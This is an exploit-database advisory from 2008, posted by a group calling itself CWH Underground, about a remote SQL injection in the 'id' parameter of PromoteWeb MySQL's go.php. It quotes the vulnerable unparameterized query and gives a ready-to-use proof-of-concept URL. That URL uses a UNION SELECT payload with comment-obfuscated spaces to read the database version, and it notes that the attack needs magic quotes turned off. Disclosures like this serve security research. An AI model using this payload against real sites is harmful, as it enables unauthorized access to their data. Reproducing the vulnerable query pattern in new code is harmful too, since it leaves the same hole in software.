PromoteWeb MySQL - 'id' SQL Injection

EDB-ID:

6577




Platform:

PHP

Date:

2008-09-26


===================================================================
  PromoteWeb MySQL (go.php id) Remote SQL Injection Vulnerability
===================================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'

AUTHOR : CWH Underground
DATE   : 26 September 2008
SITE   : cwh.citec.us


#####################################################
APPLICATION : PromoteWeb MySQL
DOWNLOAD    : http://php.deeserver.net/download/get/23/promote.zip
#####################################################

--- Remote SQL Injection ---

** Magic Quote must turn off **

-----------------------------------
 Vulnerable File (go.php)
-----------------------------------

$sql = "select * from promote where No='$id'";

---------
 Exploit
---------

[+] http://[Target]/[promote]/go.php?id=[SQL Injection]


------
 POC
------

[+] http://[Target]/[promote]/go.php?id=1'/**/UNION/**/SELECT/**/1,2,version(),4,5,6,7,8/**/FROM/**/promote/**/WHERE/**/No='1


Note!! Result of SQL Injection will appear new window with http://[result]/ 
Example: http://5.0.51a/


#####################################################################
Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos
Special Thx : asylu3, str0ke, citec.us, milw0rm.com
#####################################################################

# milw0rm.com [2008-09-26]